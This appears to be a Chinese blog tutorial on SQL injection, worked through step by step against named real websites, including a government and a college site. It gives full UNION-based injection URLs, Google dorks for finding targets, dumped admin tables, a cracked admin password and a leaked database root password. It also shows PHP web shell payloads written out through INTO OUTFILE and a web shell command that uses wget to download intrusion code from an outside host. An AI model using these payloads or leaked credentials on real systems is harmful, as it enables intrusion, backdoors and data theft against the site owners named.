网站的操作系统、web服务器等信息获取: http://browserspy.dk/webserver.php
让IE爆出详细错误信息:
设置前:
TTL:
Linux系统的TTL值为64或255,Windows NT/2000/XP系统的TTL值为128,Windows 98系统的TTL值为32,UNIX主机的TTL值为255。(http://baike.baidu.com/view/2696.htm#2)寻找注入点
注入方法: 添加单引号,或者 and 1=1, 1=2这个错误表示不能注入:
http://www.chhuaxu.com/product.asp?cataid=319'
Microsoft VBScript runtime 错误 '800a000d' Type mismatch: 'cint' /product.asp,行 60
这个错误表示可以注入:
http://www.chhuaxu.com/product_show.asp?id=5106'
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14' [Microsoft][ODBC Microsoft Access Driver] 字符串的语法错误 在查询表达式 'id=5106'' 中。 /product_show.asp,行 52
http://www.chhuaxu.com/product_show.asp?id=5106%20and%20exists%20%28select%20[pwd]%20from%20[admin]%29
Havij
扫描漏洞注入点、登录地址、数据表、字段等。 其他工具还有啊D和明小子等(只针对asp网站的国产软件)。利用 Google 搜索注入点:(可切换到中文结果)
inurl:adminintext:管理员登陆
intitle:管理员登录
site:test.com
寻找网站的后台
猜测扫描、inurl:robots.txt、google搜索SQL注入一个网站的例子
发现地址可注入:http://www.changli.gov.cn/depart/gtj/detail.php?id=463'
发现一共有11个字段,显示5,6,7,8
http://www.changli.gov.cn/depart/gtj/detail.php?id=463+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11
查数据库信息:
version():5.1.54-community
database():changli
user():changli@localhost
查出数据表名称:
http://www.changli.gov.cn/depart/gtj/detail.php?id=463+and+1=2+union+select+1,2,3,4,5,6,7,concat(group_concat(distinct+table_name)),9,10,11+from+information_schema.tables+where+table_schema=0x6368616E676C69
得到 cx_admin,cx_admin_nav,cx_admin_nav0908beifen, 等等
查出字段的名称:
http://www.changli.gov.cn/depart/gtj/detail.php?id=463+and+1=2+union+select+1,2,3,4,5,6,7,concat(group_concat(distinct+column_name)),9,10,11+from+information_schema.columns+where+table_name=0x63785F61646D696E
得到 id,admin_name,admin_pw
然后再查密码
手工注入的一般步骤
猜测表名: and exists (select * from admin) 没有错误回显就表示猜对了猜测字段: and exists (select username from admin)
获得字段数: order by 10
联表爆出密码: union select
比如:
?id=1 and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin 假如显示5,6 ,说明5,6是显示位
?id=1 and 1=2 union select 1,2,3,4,admin_name,admin_pwd,7,8,9,10,11 from admin
这样就爆出了用户名和密码
无法链表的时候用这种方法:
?id=1 and (select top 1 len(admin_name) from Admin) > 0 判断字段长度是否大于0,把0替换成其他数字一个个试
and (select top 1 asc(mid(username,N,1)) from Admin) > 0 截取字段里的第N个字符,然后获取其ascii值
比如:
http://fc1885.com/display1_new.asp?id=108 and (select top 1 asc(mid(admin_name,1,1)) from Admin) > 90
页面正常,说明该截取的字符的ascii码大于90,一个个试,最后得出为97,也就是“a”
接着试第二个字符:
http://fc1885.com/display1_new.asp?id=108 and (select top 1 asc(mid(admin_name,2,1)) from Admin) > 90
一个个试,最后得出为100,即“d”,依此类推
更高级的手工注入
http://www.hkct.edu.hk/news_detail.php?id=164 order by 11 有http://www.hkct.edu.hk/news_detail.php?id=164 order by 12 没
说明一共11个字段
查显示位
http://www.hkct.edu.hk/news_detail.php?id=164 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11
得到4,5,7
查数据库信息
http://www.hkct.edu.hk/news_detail.php?id=164 and 1=2 union select 1,2,3,version(),database(),6,7,8,9,10,11
进一步获取数据库信息(数据库名字的hex值可用小葵多功能转换工具得到,此处如:0x726576616D70)
http://www.hkct.edu.hk/news_detail.php?id=164 and 1=2 union select 1,2,3,table_name from (select * from information_schema.tables where table_schema=数据库名字的hex值 order by table_schema limit 0,1)t limit 1--
http://www.hkct.edu.hk/news_detail.php?id=164 and 1=2 union select 1,2,3,table_name,5,6,7,8,9,10,11 from (select * from information_schema.tables where table_schema=0x726576616D70 order by table_schema limit 0,1)t limit 1--
得到第一张表名: SeminarNode_seq
http://www.hkct.edu.hk/news_detail.php?id=164 and 1=2 union select 1,2,3,table_name,5,6,7,8,9,10,11 from (select * from information_schema.tables where table_schema=0x726576616D70 order by table_schema limit 1,2)t limit 1--
得到第二张表名: LinkAdvNode
http://www.hkct.edu.hk/news_detail.php?id=164 and 1=2 union select 1,2,3,table_name,5,6,7,8,9,10,11 from (select * from information_schema.tables where table_schema=0x726576616D70 order by table_schema limit 2,3)t limit 1--
得到第三张表名: AlbumNode
一直查一直查,直到:
http://www.hkct.edu.hk/news_detail.php?id=164 and 1=2 union select 1,2,3,table_name,5,6,7,8,9,10,11 from (select * from information_schema.tables where table_schema=0x726576616D70 order by table_schema limit 35,36)t limit 1--
到此为止,基本上得到了这么多表: News,AlbumNode_seq,SeminarNode_seq,LinkAdv,PrinBlogReply,HtmlPageNode_seq,Press,CourseTypeNode,NewsNode_seq,Banner,SeminarReg,LinkAdvNode,Register,Icons,PressNode,CourseTypeNode_seq,PageViews,Course,LinkAdvNode_seq,Album,Seminar,IconsNode,PressNode_seq,HtmlPage,PageViewsType,CourseNode,News,AlbumNode,SeminarNode,IconsNode_seq,PrinBlog,HtmlPageNode, Password,CourseNode_seq
然后根据Password表的hex值(0x50617373776F7264),查字段名称:
http://www.hkct.edu.hk/news_detail.php?id=164 and 1=2 union select 1,2,3,column_name,5,6,7,8,9,10,11 from (select * from information_schema.columns where table_name=0x50617373776F7264 and table_schema=0x726576616D70 order by 1 limit 0,1)t limit 1--
得到第一个字段: id
http://www.hkct.edu.hk/news_detail.php?id=164 and 1=2 union select 1,2,3,column_name,5,6,7,8,9,10,11 from (select * from information_schema.columns where table_name=0x50617373776F7264 and table_schema=0x726576616D70 order by 1 limit 1,2)t limit 1--
得到第二个字段: loginName
http://www.hkct.edu.hk/news_detail.php?id=164 and 1=2 union select 1,2,3,column_name,5,6,7,8,9,10,11 from (select * from information_schema.columns where table_name=0x50617373776F7264 and table_schema=0x726576616D70 order by 1 limit 2,3)t limit 1--
得到第三个字段: password
一直查一直查,直到全部查出有这么多字段: id,loginName,password,level,level_id,type_id,lastLogin,createDate,lastModDate
查一查id的concat值:
http://www.hkct.edu.hk/news_detail.php?id=164 and 1=2 union select 1,2,3,concat(id),5,6,7,8,9,10,11 from Password
返回: 41
爆密码:
http://www.hkct.edu.hk/news_detail.php?id=164 and 1=2 union select 1,2,3,concat(loginName),5,6,concat(password),8,9,10,11 from Password
svtadmin
06a1c9549f34dd7132a7f0380282e085 (即hmt009)
loal_file()函数
google: intext:warning mysql_fetch_array /var/www/找到:http://www.jawacz.com.ar/ficha_imprimir.php?id= 报错: /var/www/docs/jawacz.com.ar/htdocs/ficha_imprimir.php on line 52
开始: http://www.jawacz.com.ar/ficha_imprimir.php?id=1 order by 35 开始出错,说明一共有34个字段
http://www.jawacz.com.ar/ficha_imprimir.php?id=1 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34
回显: 3
http://www.jawacz.com.ar/ficha_imprimir.php?id=1 and 1=2 union select 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34
回显: uv1828@localhost
http://www.jawacz.com.ar/ficha_imprimir.php?id=1 and 1=2 union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34
回显: jawa_nuevo
http://www.jawacz.com.ar/ficha_imprimir.php?id=1 and 1=2 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34
回显: 5.1.63
http://www.jawacz.com.ar/ficha_imprimir.php?id=1 and 1=2 union select 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34
回显: 5.1.63
http://www.jawacz.com.ar/ficha_imprimir.php?id=1 and 1=2 union select 1,2,@@basedir,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34
回显: / 【安装路径】
http://www.jawacz.com.ar/ficha_imprimir.php?id=1 and 1=2 union select 1,2,@@datadir,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34
回显: /var/lib/mysql/ 【数据路径】
http://www.jawacz.com.ar/ficha_imprimir.php?id=1 and 1=2 union select 1,2,load_file(地址的16进制),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34
/var/www/docs/jawacz.com.ar/htdocs/ficha_imprimir.php 的16进制为(?): 2f7661722f7777772f646f63732f6a617761637a2e636f6d2e61722f6874646f63732f66696368615f696d7072696d69722e706870
应该回显该文件的内容的,但这里却失败了。
如果这里成功了,那么假如这个ficha_imprimir.php文件include了数据库连接文件,那么再把该文件的16进制放进去读,输出文件内容,就得到了数据库连接用户密码!
如果远程连接数据库失败,那么尝试phpmyadmin,如果登录数据库成功,可以在里面新建一个数据库,建一个表如:testtable,字段名:cmd
插入: insert into testtable(cmd) values('<?php system($_REQUEST[cmd]);?>')
再将其内容输出为文件: select * from testtable into outfile '/var/www/docs/jawacz.com.ar/htdocs/cmd.php'
访问这个cmd.php执行linux系统命令 :
http://www.jawacz.com.ar/cmd.php?cmd=ls
http://www.jawacz.com.ar/cmd.php?cmd=wget http://www.linux0day.cn/2008.txt 下载入侵代码( 内容即:https://gist.github.com/phoenixg/6475443 )
http://www.jawacz.com.ar/cmd.php?cmd=mv 2008.txt test.php
然后访问该test.php,OK!
如果magic quotes gpc是关闭的话:
那么不用转成16进制,直接load_file('/var/www/target.php')来输出该文件的内容
接着:
... union select 1,2,'<?php eval($_POST[cmd]);?>' into outfile '/var/www/hack.php' 虽然返回错误,但是可以访问这个文件,试试有没有,hack.php就是后门地址。
再利用lanker一句话后门客户端进行数据的访问,代码见: https://gist.github.com/phoenixg/6475631
PHP MySQL注入实战 1
http://www.eduid.com/newsinfo.php?id=589' 空白,表示有错误,但没有显示http://www.eduid.com/newsinfo.php?id=589 order by 1 如果没什么问题,表示可以用order by 来检测字段数
http://www.eduid.com/newsinfo.php?id=589 order by 14 检测出一共有14个字段
http://www.eduid.com/newsinfo.php?id=589 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 显示2,8 , 1=2即让它出错
http://www.eduid.com/newsinfo.php?id=-589 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 显示2,8 , 跟上面一样都可以用,id=-589即让它出错
注: 可将空格替换为+号,因为否则的话会被浏览器转成%20,不利于阅读,mysql中,空格还可以用/**/来代替,如:
http://www.eduid.com/newsinfo.php?id=-589/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14
获取数据库信息:
http://www.eduid.com/newsinfo.php?id=-589+union+select+1,user(),3,4,5,6,7,version(),9,10,11,12,13,14
回显: root@localhost , 5.1.41
http://www.eduid.com/newsinfo.php?id=-589+union+select+1,database(),3,4,5,6,7,8,9,10,11,12,13,14
回显:four_bzh
尝试读下配置:(猜测的路径)
http://www.eduid.com/newsinfo.php?id=-589 union select 1,load_file('/srv/www/htdocs/newsinfo.php'),3,4,5,6,7,8,9,10,11,12,13,14
回显错误: Warning : mysql_fetch_array() expects parameter 1 to be resource, boolean given in E:\xampp\htdocs\edu\newsinfo.php on line 5
找到了实际路径: E:\xampp\htdocs\edu\newsinfo.php
尝试用正确的路径读配置:(把实际路径用小葵多功能转换器转成HEX值放进去查)
http://www.eduid.com/newsinfo.php?id=-589 union select 1,load_file('E:/xampp/htdocs/edu/newsinfo.php'),3,4,5,6,7,8,9,10,11,12,13,14
http://www.eduid.com/newsinfo.php?id=-589 union select 1,load_file(0x453A2F78616D70702F6874646F63732F6564752F6E657773696E666F2E706870),3,4,5,6,7,8,9,10,11,12,13,14
查看页面的源代码,找到:
<? require('require/config.inc.php');
$id=$_GET[id];
$sql_news="select * from s_news where n_id=$id";
$result_news=mysql_query($sql_news);
$data_news=mysql_fetch_array($result_news);
$class=$data_news[n_class];
$small_class=$data_news[n_small_class];
$nc_id=$data_news[n_class];
?>
现在可以尝试输出文件:(把<?php eval($_POST[cmd]);?>用小葵多功能转换器转成HEX值放进去查)
http://www.eduid.com/newsinfo.php?id=-589+union+select+1,'<?php eval($_POST[cmd]);?>',3,4,5,6,7,8,9,10,11,12,13,14+into+outfile+'E:\xampp\htdocs\edu\hack.php'
http://www.eduid.com/newsinfo.php?id=-589+union+select+1,0x3C3F706870206576616C28245F504F53545B636D645D293B3F3E,3,4,5,6,7,8,9,10,11,12,13,14+into+outfile+\'E:\xampp\htdocs\edu\hack.php\'
两个都出错,说明服务器开启了magic_quotes_gpc(),所以没法into outfile了!
于是,看看配置文件: require/config.inc.php 的内容:(把E:/xampp/htdocs/edu/require/config.inc.php用小葵多功能转换器转成HEX值放进去查)
http://www.eduid.com/newsinfo.php?id=-589+union+select+1,2,3,4,5,6,7,load_file(0x453A2F78616D70702F6874646F63732F6564752F726571756972652F636F6E6669672E696E632E706870),9,10,11,12,13,14
查看网页源代码,得到该文件的内容:
<?
//配置文件 基本变量设置
//新新世纪PHP开发1.0版
$mysql_server_name="localhost";
$mysql_username="root";
$mysql_password="weilifei";
$mysql_database="four_bzh";
//------
$title="中国国际设计艺术博览会";//网站标题名称
//--------
require('function.php');
date_default_timezone_set(PRC);//更改格林威治标准时间
@$conn=mysql_connect($mysql_server_name,$mysql_username,$mysql_password) or die("<font color=#ff0000>连接mysql数据库出错或者数据库没启动!</font>");//开启服务器建立连接
mysql_query("set names 'gbk'");//这是解决乱码的关键,LINUX下改为UTF8
mysql_select_db($mysql_database,$conn);
$sql="select * from s_config";
$result=mysql_query($sql);
$data=@mysql_fetch_array($result);
?>
然后用mysql客户端连接,成功就表示支持外部连接,不成功的话,就试试猜测phpmyadmin的地址来登录。
用:114.112.55.10(www.eduid.com的IP)和上面的用户名、密码登录,不成功!尝试phpmyadmin,也不成功!
然后用Havij 1.15 探测,把 http://www.eduid.com/newsinfo.php?id=-589 放进去爆表,全爆出来了!
用爆出来的用户、密码登录用Havij探测出来的后台地址: http://www.eduid.com/admin/login.php 成功!!!
最后可以用mysql建表建字段数出到文件的方式注入webshell。
PHP MySQL注入实战 2
http://www.ahthedu.cn/include/web_content.php?id=589Havij 探测信息:
Host IP: 60.171.162.18
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.2.8
DB Server: MySQL
Selected Column Count is 22
Length of 'Current DB' is 6
Current DB: web_db
或手工探测字段数: 共22个字段
http://www.ahthedu.cn/include/web_content.php?id=589 order by 23
http://www.ahthedu.cn/include/web_content.php?id=589 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 跳到IIS 404页面
http://www.ahthedu.cn/include/web_content.php?id=-589 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 跳到IIS 404页面
原因是该数据库mysql并非版本5及以上,也可能是其他DBMS,但因为Havij已经检测出是mysql,所以基本上肯定是mysql 版本4
由于该站已经做了其他防护措施,所以接下来的步骤没有。
PHP MySQL注入实战 3
探测一些信息:
http://www.xurichangsheng.com/newDetail.php?id=589 and 1=2 union select 1,user(),3,4,5,6 等等
版本: 4.1.22-community-nt
显示位: 2和6
数据库: sq_bjxrcs
用户名: sq_bjxrcs@localhost
Havij探测信息:
Host IP: 175.41.28.90
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Keyword Found: content()
Injection type is Integer
DB Server: MySQL >=4.1
Selected Column Count is 6
Current DB: sq_bjxrcs
报错信息:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\wwwroot\bjxrcs\wwwroot\libs\db_mysql.php on line 52
绝对路径:
D:\wwwroot\bjxrcs\wwwroot\libs\db_mysql.php
尝试load_file():
http://www.xurichangsheng.com/newDetail.php?id=589 and 1=2 union select 1,load_file('D:/wwwroot/bjxrcs/wwwroot/libs/db_mysql.php'),3,4,5,6
http://www.xurichangsheng.com/newDetail.php?id=589 and 1=2 union select 1,load_file(0x443A2F777777726F6F742F626A787263732F777777726F6F742F6C6962732F64625F6D7973716C2E706870),3,4,5,6
网页源代码里没有想要的内容,失败了! 为什么呢?
没有评论:
发表评论